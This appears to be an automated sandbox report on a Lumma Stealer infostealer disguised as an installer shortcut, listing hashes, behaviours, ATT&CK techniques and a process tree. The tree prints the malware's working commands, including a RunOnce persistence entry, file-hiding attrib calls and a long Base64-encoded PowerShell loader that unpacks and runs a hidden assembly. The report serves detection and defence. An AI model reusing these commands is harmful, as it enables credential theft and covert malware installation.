Analysis

  • max time kernel
    145s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-03-2023 02:52

General

  • Target

    pcworldx64installer/Setup_x64.exe.lnk

  • Size

    1KB

  • MD5

    b1b6eb2189e0f3d7ecfea63baafca452

  • SHA1

    af279896cf4ec2c487e5599759cee19bdd0d84b6

  • SHA256

    0bbeb529931ee10f4cde96b33689c45b0406b3b33a55d4a0341fac2e67749b55

  • SHA512

    b1dbf2144f13d08b7a62a7fc24681f6c8c324b56eb4048da64836ab2d83efed80c80acc9f06e44de02ddcdb31a4eefa9f244447b128d1d73cacf583eb17f66a2

Malware Config

Signatures

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\Setup_x64.exe.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4424
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\entry.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4612
          • C:\Windows\system32\reg.exe
            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"
            5⤵
            • Adds Run key to start application
            PID:4672
          • C:\Windows\system32\attrib.exe
            attrib +s +h C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
            5⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:4668
          • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
            C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1908
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1828
            • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
              C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
              6⤵
              • Executes dropped EXE
              PID:4704
            • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
              C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
              6⤵
              • Executes dropped EXE
              PID:1972
          • C:\Windows\system32\attrib.exe
            attrib -s -h C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
            5⤵
            • Views/modifies file attributes
            PID:3532

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Hidden Files and Directories

2
T1158

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Hidden Files and Directories

2
T1158

Modify Registry

1
T1112

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    06ad34f9739c5159b4d92d702545bd49

    SHA1

    9152a0d4f153f3f40f7e606be75f81b582ee0c17

    SHA256

    474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

    SHA512

    c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    aab2140164bbf4ec8b3f1090c5d961c1

    SHA1

    1e35a80c641afa95c321c6a5c4b2cea5531221a5

    SHA256

    a32a6bb39a92d44e228fb8bfdc7c85c86acaa49a8dfbe2d1e69324184ff9fca6

    SHA512

    b7b290c4a6a22faa74d2088e64f0933e07cd9b1e01c82b1d755f18db0098fe8d32eb46495245a84f135eb571530fef9bb2864aa90fa4a743aa594133be03525a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdtnkmhm.lpn.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Local\Temp\pcworldx64installer\README.md\inst\particovl.bat.exe
    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • memory/1828-174-0x0000000003390000-0x00000000033A0000-memory.dmp
    Filesize

    64KB

  • memory/1828-177-0x0000000003390000-0x00000000033A0000-memory.dmp
    Filesize

    64KB

  • memory/1828-176-0x0000000003390000-0x00000000033A0000-memory.dmp
    Filesize

    64KB

  • memory/1828-173-0x0000000003390000-0x00000000033A0000-memory.dmp
    Filesize

    64KB

  • memory/1908-144-0x0000000004FB0000-0x0000000005016000-memory.dmp
    Filesize

    408KB

  • memory/1908-145-0x0000000005120000-0x0000000005186000-memory.dmp
    Filesize

    408KB

  • memory/1908-158-0x00000000061F0000-0x000000000620A000-memory.dmp
    Filesize

    104KB

  • memory/1908-159-0x00000000029A0000-0x00000000029B0000-memory.dmp
    Filesize

    64KB

  • memory/1908-160-0x00000000029A0000-0x00000000029B0000-memory.dmp
    Filesize

    64KB

  • memory/1908-161-0x0000000006ED0000-0x0000000006F0C000-memory.dmp
    Filesize

    240KB

  • memory/1908-162-0x00000000029A0000-0x00000000029B0000-memory.dmp
    Filesize

    64KB

  • memory/1908-156-0x00000000029A0000-0x00000000029B0000-memory.dmp
    Filesize

    64KB

  • memory/1908-155-0x0000000005CC0000-0x0000000005CDE000-memory.dmp
    Filesize

    120KB

  • memory/1908-157-0x0000000007600000-0x0000000007C7A000-memory.dmp
    Filesize

    6.5MB

  • memory/1908-143-0x0000000004E10000-0x0000000004E32000-memory.dmp
    Filesize

    136KB

  • memory/1908-142-0x00000000029A0000-0x00000000029B0000-memory.dmp
    Filesize

    64KB

  • memory/1908-141-0x00000000029A0000-0x00000000029B0000-memory.dmp
    Filesize

    64KB

  • memory/1908-139-0x0000000002490000-0x00000000024C6000-memory.dmp
    Filesize

    216KB

  • memory/1908-140-0x0000000005300000-0x0000000005928000-memory.dmp
    Filesize

    6.2MB

  • memory/1972-181-0x0000000000400000-0x0000000000507000-memory.dmp
    Filesize

    1.0MB

  • memory/1972-186-0x0000000000400000-0x0000000000507000-memory.dmp
    Filesize

    1.0MB

  • memory/1972-183-0x0000000000400000-0x0000000000507000-memory.dmp
    Filesize

    1.0MB

  • memory/1972-188-0x0000000000400000-0x0000000000507000-memory.dmp
    Filesize

    1.0MB

  • memory/1972-189-0x0000000000400000-0x0000000000507000-memory.dmp
    Filesize

    1.0MB